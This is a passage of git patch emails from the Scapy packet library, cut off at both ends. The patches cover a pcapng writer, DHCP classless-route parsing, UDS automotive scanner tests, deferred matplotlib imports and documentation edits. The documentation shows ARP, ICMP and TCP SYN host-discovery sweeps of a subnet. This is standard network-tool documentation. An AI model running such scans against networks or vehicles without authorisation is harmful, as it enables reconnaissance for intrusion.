self.f.write(self.build_block(block_type, block_idb)) + + def _write_block_spb(self, raw_pkt): + # type: (bytes) -> None + + # Block Type + block_type = struct.pack(self.endian + "I", 3) + # Original Packet Length + block_spb = struct.pack(self.endian + "I", len(raw_pkt)) + # Packet Data + block_spb += raw_pkt + + self.f.write(self.build_block(block_type, block_spb)) + + def _write_block_epb(self, + raw_pkt, # type: bytes + timestamp=None, # type: Optional[Union[EDecimal, float]] # noqa: E501 + caplen=None, # type: Optional[int] + orglen=None # type: Optional[int] + ): + # type: (...) -> None + + if timestamp: + tmp_ts = int(timestamp * self.tsresol) + ts_high = tmp_ts >> 32 + ts_low = tmp_ts & 0xFFFFFFFF + else: + ts_high = ts_low = 0 + + if not caplen: + caplen = len(raw_pkt) + + if not orglen: + orglen = len(raw_pkt) + + # Block Type + block_type = struct.pack(self.endian + "I", 6) + # Interface ID + block_epb = struct.pack(self.endian + "I", 0) + # Timestamp (High) + block_epb += struct.pack(self.endian + "I", ts_high) + # Timestamp (Low) + block_epb += struct.pack(self.endian + "I", ts_low) + # Captured Packet Length + block_epb += struct.pack(self.endian + "I", caplen) + # Original Packet Length + block_epb += struct.pack(self.endian + "I", orglen) + # Packet Data + block_epb += raw_pkt + + self.f.write(self.build_block(block_type, block_epb)) + + def _write_packet(self, + packet, # type: bytes + sec=None, # type: Optional[float] + usec=None, # type: Optional[int] + caplen=None, # type: Optional[int] + wirelen=None # type: Optional[int] + ): # type: (...) -> None """ Writes a single packet to the pcap file. - :param packet: Packet, or bytes for a single packet - :type packet: scapy.packet.Packet or bytes + :param packet: bytes for a single packet + :type packet: bytes :param sec: time the packet was captured, in seconds since epoch. If not supplied, defaults to now. - :type sec: int or long - :param usec: If ``nano=True``, then number of nanoseconds after the - second that the packet was captured. If ``nano=False``, - then the number of microseconds after the second the - packet was captured. If ``sec`` is not specified, - this value is ignored. - :type usec: int or long + :type sec: float :param caplen: The length of the packet in the capture file. If not - specified, uses ``len(raw(packet))``. + specified, uses ``len(packet)``. :type caplen: int :param wirelen: The length of the packet on the wire. If not - specified, tries ``packet.wirelen``, otherwise uses - ``caplen``. + specified, uses ``caplen``. :type wirelen: int :return: None :rtype: None """ + if caplen is None: + caplen = len(packet) + if wirelen is None: + wirelen = caplen + + self._write_block_epb(packet, timestamp=sec, caplen=caplen, + orglen=wirelen) + if self.sync: + self.f.flush() + + +class PcapWriter(RawPcapWriter): + """A stream PCAP writer with more control than wrpcap()""" + pass + + +class PcapNgWriter(RawPcapNgWriter): + """A stream pcapng writer with more control than wrpcapng()""" + + def _get_time(self, + packet, # type: Union[bytes, Packet] + sec, # type: Optional[float] + usec # type: Optional[int] + ): + # type: (...) -> Tuple[float, int] if hasattr(packet, "time"): if sec is None: - sec = int(packet.time) # type: ignore - usec = int(round((packet.time - sec) * # type: ignore - (1000000000 if self.nano else 1000000))) + sec = float(packet.time) # type: ignore + if usec is None: usec = 0 - rawpkt = bytes_encode(packet) - caplen = len(rawpkt) if caplen is None else caplen - - if wirelen is None: - if hasattr(packet, "wirelen"): - wirelen = packet.wirelen # type: ignore - if wirelen is None: - wirelen = caplen - - self._write_packet( - rawpkt, - sec=sec, usec=usec, - caplen=caplen, wirelen=wirelen - ) + return sec, usec # type: ignore @conf.commands.register diff --git a/test/regression.uts b/test/regression.uts index 94649cc6cac..cc1cb7ed6c8 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -1841,6 +1841,35 @@ assert Ether in pktpcapngdefaults[0] pktcapng = sniff(offline=scapy_path("/test/pcaps/macos.pcapng.gz")) assert len(pktcapng) != 0 += Write a pcapng + +tmpfile = get_temp_file(autoext=".pcapng") +r = RawPcapNgWriter(tmpfile) +r._write_block_shb() +r._write_block_idb() +ts = 1632568366.384185 +r._write_block_epb(raw(Ether()/"Hello Scapy!!!"), ts) +r.f.close() + +assert os.stat(tmpfile).st_size == 108 + +l = rdpcap(tmpfile) +assert b"Scapy" in l[0][Raw].load +assert l[0].time == ts + += Check wrpcapng() + +tmpfile = get_temp_file(autoext=".pcapng") +p = Ether()/"Hello Scapy!!!" +p.time = 1632568366.384185 +wrpcapng(tmpfile, p) + +assert os.stat(tmpfile).st_size == 108 + +l = rdpcap(tmpfile) +assert b"Scapy" in l[0][Raw].load +assert l[0].time == ts + = Read a pcap file with wirelen != captured len pktpcapwirelen = rdpcap(pcapwirelenfile) @@ -2109,13 +2138,10 @@ fd = get_temp_file() with RawPcapWriter(fd, linktype=1) as w: w.write(b"test") -try: - fd = get_temp_file() - with RawPcapWriter(fd) as w: - w.write(b"test") - assert False -except ValueError: - pass +fd = get_temp_file() +with RawPcapWriter(fd) as w: + w.write(b"test") + assert w.linktype == 1 = Check tcpdump() ~ tcpdump From 31c365094fe5aff685801088fb41b2d116ef3646 Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Fri, 6 May 2022 13:41:07 +0200 Subject: [PATCH 0778/1632] Fix bug in computation of nodes inside Graph --- scapy/contrib/automotive/scanner/graph.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/scapy/contrib/automotive/scanner/graph.py b/scapy/contrib/automotive/scanner/graph.py index 7a74d553b1b..6b120b2fa2b 100644 --- a/scapy/contrib/automotive/scanner/graph.py +++ b/scapy/contrib/automotive/scanner/graph.py @@ -84,7 +84,7 @@ def nodes(self): Get a set of all nodes in this Graph :return: """ - return set([n for _, p in self.edges.items() for n in p]) + return set([n for k, p in self.edges.items() for n in p + [k]]) def render(self, filename="SystemStateGraph.gv", view=True): # type: (str, bool) -> None From b3c698d191333b0433c1548e0b414e5d80b18ce8 Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Mon, 9 May 2022 09:30:46 +0200 Subject: [PATCH 0779/1632] Increase test-coverage of UDS-Scanner (#3595) * Increase test-coverage of UDS-Scanner * fix python2 --- test/contrib/automotive/scanner/test_case.uts | 22 +++++++++++++++++++ .../automotive/scanner/uds_scanner.uts | 19 ++++++++++++++++ 2 files changed, 41 insertions(+) diff --git a/test/contrib/automotive/scanner/test_case.uts b/test/contrib/automotive/scanner/test_case.uts index 8f3103ff09f..3dd43daac28 100644 --- a/test/contrib/automotive/scanner/test_case.uts +++ b/test/contrib/automotive/scanner/test_case.uts @@ -13,9 +13,31 @@ from scapy.contrib.automotive.ecu import EcuState class MyTestCase(AutomotiveTestCase): _description = "MyTestCase" + _supported_kwargs = {"testarg": int} def supported_responses(self): return [] += Check supported kwargs + +try: + MyTestCase.check_kwargs({"testarg": 5}) +except Scapy_Exception as e: + assert False + +try: + MyTestCase.check_kwargs({"test": 5}) + assert False +except Scapy_Exception as e: + assert "Keyword-Argument test not supported" in str(e) + +try: + MyTestCase.check_kwargs({"testarg": 5.5}) + assert False +except Scapy_Exception as e: + assert "Keyword-Value" in str(e) + assert "is not instance of type " in str(e) or \ + "is not instance of type " in str(e) + = Create instance of test class mt = MyTestCase() diff --git a/test/contrib/automotive/scanner/uds_scanner.uts b/test/contrib/automotive/scanner/uds_scanner.uts index 942e34a2443..54bd5499db1 100644 --- a/test/contrib/automotive/scanner/uds_scanner.uts +++ b/test/contrib/automotive/scanner/uds_scanner.uts @@ -796,6 +796,25 @@ result = tc1.show(dump=True) assert "requestOutOfRange received " in result += UDS_RMBARandomEnumerator + +pkt = UDS_RMBARandomEnumerator._random_memory_addr_pkt(4, 4, 10) + +assert pkt.memorySizeLen == 4 +assert pkt.memoryAddressLen == 4 +assert pkt.memorySize4 == 10 +assert pkt.memoryAddress4 is not None + +pkt = UDS_RMBARandomEnumerator._random_memory_addr_pkt() + +assert pkt.memorySizeLen in [1, 2, 3, 4] +assert pkt.memoryAddressLen in [1, 2, 3, 4] + +pkt2 = UDS_RMBARandomEnumerator._random_memory_addr_pkt() + +assert pkt != pkt2 + + = UDS_RMBAEnumerator ~ linux not_pypy From 064e0d23e21caf3c4d83ca897d60eb19f1e7e759 Mon Sep 17 00:00:00 2001 From: "J. Nick Koston" Date: Mon, 9 May 2022 02:33:30 -0500 Subject: [PATCH 0780/1632] Defer import of matplotlib until needed (#3579) * Defer import of matplotlib until needed matplotlib has a heavy dep chain Fixes #3578 * relocate * pyx relo * update docstrings * git add file * fix typo * fix typo * naming * missed one * adjust logging to try to figure out why it fails on py27 windows * fix py27 windows * unguarded raise * try to make py27 happy * name collision? * tweak * rename to avoid name collision --- .config/mypy/mypy_enabled.txt | 1 - scapy/layers/inet.py | 11 +++++-- scapy/libs/matplot.py | 43 +++++++++++++++++++++++++++ scapy/{extlib.py => libs/test_pyx.py} | 28 +---------------- scapy/packet.py | 2 +- scapy/plist.py | 26 ++++++++++++++-- test/regression.uts | 29 +++++++++++------- test/scapy/layers/inet.uts | 3 +- 8 files changed, 98 insertions(+), 45 deletions(-) create mode 100644 scapy/libs/matplot.py rename scapy/{extlib.py => libs/test_pyx.py} (61%) diff --git a/.config/mypy/mypy_enabled.txt b/.config/mypy/mypy_enabled.txt index 51c4489d5df..bac92bfa35a 100644 --- a/.config/mypy/mypy_enabled.txt +++ b/.config/mypy/mypy_enabled.txt @@ -30,7 +30,6 @@ scapy/consts.py scapy/dadict.py scapy/data.py scapy/error.py -scapy/extlib.py scapy/fields.py scapy/interfaces.py scapy/main.py diff --git a/scapy/layers/inet.py b/scapy/layers/inet.py index aac23467c5c..03cf470f043 100644 --- a/scapy/layers/inet.py +++ b/scapy/layers/inet.py @@ -27,8 +27,6 @@ Loopback from scapy.compat import raw, chb, orb, bytes_encode, Optional from scapy.config import conf -from scapy.extlib import plt, MATPLOTLIB, MATPLOTLIB_INLINED, \ - MATPLOTLIB_DEFAULT_PLOT_KARGS from scapy.fields import ( BitEnumField, BitField, @@ -1282,6 +1280,13 @@ def defragment(plist): # Add timeskew_graph() method to PacketList def _packetlist_timeskew_graph(self, ip, **kargs): """Tries to graph the timeskew between the timestamps and real time for a given ip""" # noqa: E501 + # Defer imports of matplotlib until its needed + # because it has a heavy dep chain + from scapy.libs.matplot import ( + plt, + MATPLOTLIB_INLINED, + MATPLOTLIB_DEFAULT_PLOT_KARGS + ) # Filter TCP segments which source address is 'ip' tmp = (self._elt2pkt(x) for x in self.res) @@ -1534,6 +1539,8 @@ def world_trace(self): # Check that the geoip2 module can be imported # Doc: http://geoip2.readthedocs.io/en/latest/ + from scapy.libs.matplot import plt, MATPLOTLIB, MATPLOTLIB_INLINED + try: # GeoIP2 modules need to be imported as below import geoip2.database diff --git a/scapy/libs/matplot.py b/scapy/libs/matplot.py new file mode 100644 index 00000000000..b725a7a1313 --- /dev/null +++ b/scapy/libs/matplot.py @@ -0,0 +1,43 @@ +# This file is part of Scapy +# See http://www.secdev.org/projects/scapy for more information +# Copyright (C) Philippe Biondi +# This program is published under a GPLv2 license + +""" +External link to matplotlib +""" + +from scapy.error import log_loading + +# Notice: this file must not be called before main.py, if started +# in interactive mode, because it needs to be called after the +# logger has been setup, to be able to print the warning messages + +__all__ = [ + "Line2D", + "MATPLOTLIB", + "MATPLOTLIB_DEFAULT_PLOT_KARGS", + "MATPLOTLIB_INLINED", + "plt", +] + +# MATPLOTLIB + +try: + from matplotlib import get_backend as matplotlib_get_backend + from matplotlib import pyplot as plt + from matplotlib.lines import Line2D + MATPLOTLIB = 1 + if "inline" in matplotlib_get_backend(): + MATPLOTLIB_INLINED = 1 + else: + MATPLOTLIB_INLINED = 0 + MATPLOTLIB_DEFAULT_PLOT_KARGS = {"marker": "+"} +# RuntimeError to catch gtk "Cannot open display" error +except (ImportError, RuntimeError) as ex: + plt = None + Line2D = None + MATPLOTLIB = 0 + MATPLOTLIB_INLINED = 0 + MATPLOTLIB_DEFAULT_PLOT_KARGS = dict() + log_loading.info("Can't import matplotlib: %s. Won't be able to plot.", ex) diff --git a/scapy/extlib.py b/scapy/libs/test_pyx.py similarity index 61% rename from scapy/extlib.py rename to scapy/libs/test_pyx.py index d6f4bcefcb2..fa2e3cee50a 100644 --- a/scapy/extlib.py +++ b/scapy/libs/test_pyx.py @@ -4,7 +4,7 @@ # This program is published under a GPLv2 license """ -External link to programs +External link to pyx """ import os @@ -16,35 +16,9 @@ # logger has been setup, to be able to print the warning messages __all__ = [ - "Line2D", - "MATPLOTLIB", - "MATPLOTLIB_DEFAULT_PLOT_KARGS", - "MATPLOTLIB_INLINED", "PYX", - "plt", ] -# MATPLOTLIB - -try: - from matplotlib import get_backend as matplotlib_get_backend - from matplotlib import pyplot as plt - from matplotlib.lines import Line2D - MATPLOTLIB = 1 - if "inline" in matplotlib_get_backend(): - MATPLOTLIB_INLINED = 1 - else: - MATPLOTLIB_INLINED = 0 - MATPLOTLIB_DEFAULT_PLOT_KARGS = {"marker": "+"} -# RuntimeError to catch gtk "Cannot open display" error -except (ImportError, RuntimeError): - plt = None - Line2D = None - MATPLOTLIB = 0 - MATPLOTLIB_INLINED = 0 - MATPLOTLIB_DEFAULT_PLOT_KARGS = dict() - log_loading.info("Can't import matplotlib. Won't be able to plot.") - # PYX diff --git a/scapy/packet.py b/scapy/packet.py index 6fc13165b81..871fa52584f 100644 --- a/scapy/packet.py +++ b/scapy/packet.py @@ -46,7 +46,7 @@ from scapy.utils import import_hexcap, tex_escape, colgen, issubtype, \ pretty_list, EDecimal from scapy.error import Scapy_Exception, log_runtime, warning -from scapy.extlib import PYX +from scapy.libs.test_pyx import PYX import scapy.libs.six as six # Typing imports diff --git a/scapy/plist.py b/scapy/plist.py index f9e99af567f..a5b63a64d11 100644 --- a/scapy/plist.py +++ b/scapy/plist.py @@ -12,6 +12,7 @@ from __future__ import print_function import os from collections import defaultdict +from typing import TYPE_CHECKING from scapy.compat import lambda_tuple_converter from scapy.config import conf @@ -24,8 +25,6 @@ ) from scapy.utils import do_graph, hexdump, make_table, make_lined_table, \ make_tex_table, issubtype -from scapy.extlib import plt, Line2D, \ - MATPLOTLIB_INLINED, MATPLOTLIB_DEFAULT_PLOT_KARGS from functools import reduce import scapy.libs.six as six @@ -47,6 +46,8 @@ ) from scapy.packet import Packet +if TYPE_CHECKING: + from scapy.libs.matplot import Line2D ############# # Results # @@ -289,6 +290,13 @@ def plot(self, lfilter: a truth function that decides whether a packet must be plotted """ + # Defer imports of matplotlib until its needed + # because it has a heavy dep chain + from scapy.libs.matplot import ( + plt, + MATPLOTLIB_INLINED, + MATPLOTLIB_DEFAULT_PLOT_KARGS + ) # Python 2 backward compatibility f = lambda_tuple_converter(f) @@ -327,6 +335,13 @@ def diffplot(self, A list of matplotlib.lines.Line2D is returned. """ + # Defer imports of matplotlib until its needed + # because it has a heavy dep chain + from scapy.libs.matplot import ( + plt, + MATPLOTLIB_INLINED, + MATPLOTLIB_DEFAULT_PLOT_KARGS + ) # Get the list of packets if lfilter is None: @@ -360,6 +375,13 @@ def multiplot(self, A list of matplotlib.lines.Line2D is returned. """ + # Defer imports of matplotlib until its needed + # because it has a heavy dep chain + from scapy.libs.matplot import ( + plt, + MATPLOTLIB_INLINED, + MATPLOTLIB_DEFAULT_PLOT_KARGS + ) # Python 2 backward compatibility f = lambda_tuple_converter(f) diff --git a/test/regression.uts b/test/regression.uts index cc1cb7ed6c8..9889734ff1b 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -905,36 +905,37 @@ from mock import patch def _r(*args, **kwargs): raise OSError -with patch("scapy.extlib.subprocess.check_call", _r): - from scapy.extlib import _test_pyx +with patch("scapy.libs.test_pyx.subprocess.check_call", _r): + from scapy.libs.test_pyx import _test_pyx assert _test_pyx() == False = Test matplotlib detection functions from mock import MagicMock, patch -bck_scapy_ext_lib = sys.modules.get("scapy.extlib", None) -del(sys.modules["scapy.extlib"]) +bck_scapy_libs_matplot = sys.modules.get("scapy.libs.matplot", None) +if bck_scapy_libs_matplot: + del(sys.modules["scapy.libs.matplot"]) mock_matplotlib = MagicMock() mock_matplotlib.get_backend.return_value = "inline" mock_matplotlib.pyplot = MagicMock() mock_matplotlib.pyplot.plt = None with patch.dict("sys.modules", **{ "matplotlib": mock_matplotlib, "matplotlib.lines": mock_matplotlib}): - from scapy.extlib import MATPLOTLIB, MATPLOTLIB_INLINED, MATPLOTLIB_DEFAULT_PLOT_KARGS, Line2D + from scapy.libs.matplot import MATPLOTLIB, MATPLOTLIB_INLINED, MATPLOTLIB_DEFAULT_PLOT_KARGS, Line2D assert MATPLOTLIB == 1 assert MATPLOTLIB_INLINED == 1 assert "marker" in MATPLOTLIB_DEFAULT_PLOT_KARGS mock_matplotlib.get_backend.return_value = "ko" with patch.dict("sys.modules", **{ "matplotlib": mock_matplotlib, "matplotlib.lines": mock_matplotlib}): - from scapy.extlib import MATPLOTLIB, MATPLOTLIB_INLINED, MATPLOTLIB_DEFAULT_PLOT_KARGS + from scapy.libs.matplot import MATPLOTLIB, MATPLOTLIB_INLINED, MATPLOTLIB_DEFAULT_PLOT_KARGS assert MATPLOTLIB == 1 assert MATPLOTLIB_INLINED == 0 assert "marker" in MATPLOTLIB_DEFAULT_PLOT_KARGS -if bck_scapy_ext_lib: - sys.modules["scapy.extlib"] = bck_scapy_ext_lib +if bck_scapy_libs_matplot: + sys.modules["scapy.libs.matplot"] = bck_scapy_libs_matplot ############ @@ -4409,7 +4410,9 @@ assert all(bytes(a[0]) == bytes(b[0]) for a, b in zip(unp, srl)) = plot() import mock -@mock.patch("scapy.plist.plt") +import scapy.libs.matplot + +@mock.patch("scapy.libs.matplot.plt") def test_plot(mock_plt): def fake_plot(data, **kwargs): return data @@ -4423,7 +4426,9 @@ test_plot() = diffplot() import mock -@mock.patch("scapy.plist.plt") +import scapy.libs.matplot + +@mock.patch("scapy.libs.matplot.plt") def test_diffplot(mock_plt): def fake_plot(data, **kwargs): return data @@ -4437,7 +4442,9 @@ test_diffplot() = multiplot() import mock -@mock.patch("scapy.plist.plt") +import scapy.libs.matplot + +@mock.patch("scapy.libs.matplot.plt") def test_multiplot(mock_plt): def fake_plot(data, **kwargs): return data diff --git a/test/scapy/layers/inet.uts b/test/scapy/layers/inet.uts index 9c1fccc1ebd..349866a674e 100644 --- a/test/scapy/layers/inet.uts +++ b/test/scapy/layers/inet.uts @@ -568,8 +568,9 @@ def test_summary(): test_summary() import mock +import scapy.libs.matplot -@mock.patch("scapy.layers.inet.plt") +@mock.patch("scapy.libs.matplot.plt") def test_timeskew_graph(mock_plt): def fake_plot(data, **kwargs): return data From f5b718881441637e9f8cab75515981b32247f707 Mon Sep 17 00:00:00 2001 From: coatesamzn <99427863+coatesamzn@users.noreply.github.com> Date: Mon, 16 May 2022 17:22:17 -0400 Subject: [PATCH 0781/1632] Add DHCP option 121: Classless Static Routes (#3536) * Add DHCP option 121: Classless Static Routes with regression test * add type hinting and prevent route_len from being 0 * use orb instead of struct.unpack * prevent bad prefix values, use orb() instead of PY version check * print decimal and hex of invalid prefix * Cleanup the field Co-authored-by: gpotter2 --- scapy/layers/dhcp.py | 69 ++++++++++++++++++++++++++++++++++++++ test/scapy/layers/dhcp.uts | 6 ++++ 2 files changed, 75 insertions(+) diff --git a/scapy/layers/dhcp.py b/scapy/layers/dhcp.py index 17e14398a6d..eab081e452f 100644 --- a/scapy/layers/dhcp.py +++ b/scapy/layers/dhcp.py @@ -17,6 +17,9 @@ import random import struct +import socket +import re + from scapy.ansmachine import AnsweringMachine from scapy.base_classes import Net from scapy.compat import chb, orb, bytes_encode @@ -87,6 +90,69 @@ def getfield(self, pkt, s): ret.append(val) return b"", [x[0] for x in ret] + +class ClasslessStaticRoutesField(Field): + """ + RFC 3442 defines classless static routes as up to 9 bytes per entry: + + # Code Len Destination 1 Router 1 + +-----+---+----+-----+----+----+----+----+----+ + | 121 | n | d1 | ... | dN | r1 | r2 | r3 | r4 | + +-----+---+----+-----+----+----+----+----+----+ + + Destination first byte contains one octet describing the width followed + by all the significant octets of the subnet. + """ + def m2i(self, pkt, x): + # type: (Packet, bytes) -> str + # b'\x20\x01\x02\x03\x04\t\x08\x07\x06' -> (1.2.3.4/32:9.8.7.6) + prefix = orb(x[0]) + + octets = (prefix + 7) // 8 + # Create the destination IP by using the number of octets + # and padding up to 4 bytes to ensure a valid IP. + dest = x[1:1 + octets] + dest = socket.inet_ntoa(dest.ljust(4, b'\x00')) + + router = x[1 + octets:5 + octets] + router = socket.inet_ntoa(router) + + return dest + "/" + str(prefix) + ":" + router + + def i2m(self, pkt, x): + # type: (Packet, str) -> bytes + # (1.2.3.4/32:9.8.7.6) -> b'\x20\x01\x02\x03\x04\t\x08\x07\x06' + if not x: + return b'' + + spx = re.split('/|:', x) + prefix = int(spx[1]) + # if prefix is invalid value ( 0 > prefix > 32 ) then break + if prefix > 32 or prefix < 0: + warning("Invalid prefix value: %d (0x%x)", prefix, prefix) + return b'' + octets = (prefix + 7) // 8 + dest = socket.inet_aton(spx[0])[:octets] + router = socket.inet_aton(spx[2]) + return struct.pack('b', prefix) + dest + router + + def getfield(self, pkt, s): + if not s: + return None + + prefix = orb(s[0]) + # if prefix is invalid value ( 0 > prefix > 32 ) then break + if prefix > 32 or prefix < 0: + warning("Invalid prefix value: %d (0x%x)", prefix, prefix) + return s, [] + + route_len = 5 + (prefix + 7) // 8 + return s[route_len:], self.m2i(pkt, s[:route_len]) + + def addfield(self, pkt, s, val): + return s + self.i2m(pkt, val) + + # DHCP_UNKNOWN, DHCP_IP, DHCP_IPLIST, DHCP_TYPE \ # = range(4) # @@ -209,6 +275,9 @@ def getfield(self, pkt, s): 116: ByteField("auto-config", 0), 117: ShortField("name-service-search", 0,), 118: IPField("subnet-selection", "0.0.0.0"), + 121: FieldListField("classless_static_routes", + [], + ClasslessStaticRoutesField("route", 0)), 124: "vendor_class", 125: "vendor_specific_information", 128: IPField("tftp_server_ip_address", "0.0.0.0"), diff --git a/test/scapy/layers/dhcp.uts b/test/scapy/layers/dhcp.uts index c66526e32bb..8178bdf4c3f 100644 --- a/test/scapy/layers/dhcp.uts +++ b/test/scapy/layers/dhcp.uts @@ -47,6 +47,9 @@ assert s3 == b'E\x00\x01=\x00\x01\x00\x00@\x11{\xad\x7f\x00\x00\x01\x7f\x00\x00\ s4 = raw(IP(src="127.0.0.1")/UDP()/BOOTP(chaddr="00:01:02:03:04:05")/DHCP(options=[("mud-url", "https://example.org"), "end"])) assert s4 == b'E\x00\x01"\x00\x01\x00\x00@\x11{\xc8\x7f\x00\x00\x01\x7f\x00\x00\x01\x00C\x00D\x01\x0e\tr\x01\x01\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0000:01:02:03:04:0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00c\x82Sc\xa1\x13https://example.org\xff' +s5 = raw(IP(src="127.0.0.1")/UDP()/BOOTP(chaddr="00:01:02:03:04:05")/DHCP(options=[("classless_static_routes", "192.168.123.4/32:10.0.0.1", "169.254.254.0/24:10.0.1.2"), "end"])) +assert s5 == b'E\x00\x01 \x00\x01\x00\x00@\x11{\xca\x7f\x00\x00\x01\x7f\x00\x00\x01\x00C\x00D\x01\x0c\xabQ\x01\x01\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0000:01:02:03:04:0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00c\x82Scy\x11 \xc0\xa8{\x04\n\x00\x00\x01\x18\xa9\xfe\xfe\n\x00\x01\x02\xff' + = DHCP - dissection p = IP(s) @@ -71,6 +74,9 @@ p4 = IP(s4) assert DHCP in p4 assert p4[DHCP].options[0] == ("mud-url", b"https://example.org") +p5 = IP(s5) +assert DHCP in p5 +assert p5[DHCP].options[0] == ("classless_static_routes", ["192.168.123.4/32:10.0.0.1", "169.254.254.0/24:10.0.1.2"]) = DHCPOptions # Issue #2786 From 482b6d3a603aa53642bf363093f7751f6e867466 Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Wed, 11 May 2022 16:41:57 +0200 Subject: [PATCH 0782/1632] Fix a minor issue in uds_scan.py on configuration access --- scapy/contrib/automotive/uds_scan.py | 10 ++++++++-- 1 file changed, 8 insertions(+), 2 deletions(-) diff --git a/scapy/contrib/automotive/uds_scan.py b/scapy/contrib/automotive/uds_scan.py index eaa90477087..b0115c059ce 100644 --- a/scapy/contrib/automotive/uds_scan.py +++ b/scapy/contrib/automotive/uds_scan.py @@ -134,7 +134,10 @@ def enter_state(socket, # type: _SocketUnion configuration, # type: AutomotiveTestCaseExecutorConfiguration # noqa: E501 request # type: Packet ): # type: (...) -> bool - timeout = configuration[UDS_DSCEnumerator.__name__].get("timeout", 3) + try: + timeout = configuration[UDS_DSCEnumerator.__name__]["timeout"] + except KeyError: + timeout = 3 ans = socket.sr1(request, timeout=timeout, verbose=False) if ans is not None: if configuration.verbose: @@ -165,7 +168,10 @@ def enter_state_with_tp(sock, # type: _SocketUnion UDS_TPEnumerator.enter(sock, conf, kwargs) # Wait 5 seconds, since some ECUs require time # to switch to the bootloader - delay = conf[UDS_DSCEnumerator.__name__].get("delay_state_change", 5) + try: + delay = conf[UDS_DSCEnumerator.__name__]["delay_state_change"] + except KeyError: + delay = 5 time.sleep(delay) state_changed = UDS_DSCEnumerator.enter_state( sock, conf, kwargs["req"]) From e6740813e5816b460d07b377f9e0075ec2ab25dc Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Tue, 17 May 2022 11:31:08 +0200 Subject: [PATCH 0783/1632] Minor doc cleanups (#3608) --- doc/scapy/usage.rst | 23 +++++++++++++++++------ 1 file changed, 17 insertions(+), 6 deletions(-) diff --git a/doc/scapy/usage.rst b/doc/scapy/usage.rst index c6cb273f62e..08c402ce7eb 100644 --- a/doc/scapy/usage.rst +++ b/doc/scapy/usage.rst @@ -210,6 +210,17 @@ For the moment, we have only generated one packet. Let see how to specify sets o Some operations (like building the string from a packet) can't work on a set of packets. In these cases, if you forgot to unroll your set of packets, only the first element of the list you forgot to generate will be used to assemble the packet. +On the other hand, it is possible to move sets of packets into a `PacketList` object, which provides some operations on lists of packets. + +:: + + >>> p = PacketList(a) + >>> p + + >>> p = PacketList([p for p in a/c]) + >>> p + + =============== ==================================================== Command Effect =============== ==================================================== @@ -223,7 +234,7 @@ hexraw() returns a hexdump of the Raw layer of all packets padding() returns a hexdump of packets with padding nzpadding() returns a hexdump of packets with non-zero padding plot() plots a lambda function applied to the packet list -make table() displays a table according to a lambda function +make\_table() displays a table according to a lambda function =============== ==================================================== @@ -1294,7 +1305,7 @@ ARP Ping The fastest way to discover hosts on a local ethernet network is to use the ARP Ping method:: - >>> ans, unans = srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst="192.168.1.0/24"),timeout=2) + >>> ans, unans = srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst="192.168.1.0/24"), timeout=2) Answers can be reviewed with the following command:: @@ -1302,7 +1313,7 @@ Answers can be reviewed with the following command:: Scapy also includes a built-in arping() function which performs similar to the above two commands: - >>> arping("192.168.1.*") + >>> arping("192.168.1.0/24") ICMP Ping @@ -1310,7 +1321,7 @@ ICMP Ping Classical ICMP Ping can be emulated using the following command:: - >>> ans, unans = sr(IP(dst="192.168.1.1-254")/ICMP()) + >>> ans, unans = sr(IP(dst="192.168.1.0/24")/ICMP(), timeout=3) Information on live hosts can be collected with the following request:: @@ -1322,7 +1333,7 @@ TCP Ping In cases where ICMP echo requests are blocked, we can still use various TCP Pings such as TCP SYN Ping below:: - >>> ans, unans = sr( IP(dst="192.168.1.*")/TCP(dport=80,flags="S") ) + >>> ans, unans = sr( IP(dst="192.168.1.0/24")/TCP(dport=80,flags="S") ) Any response to our probes will indicate a 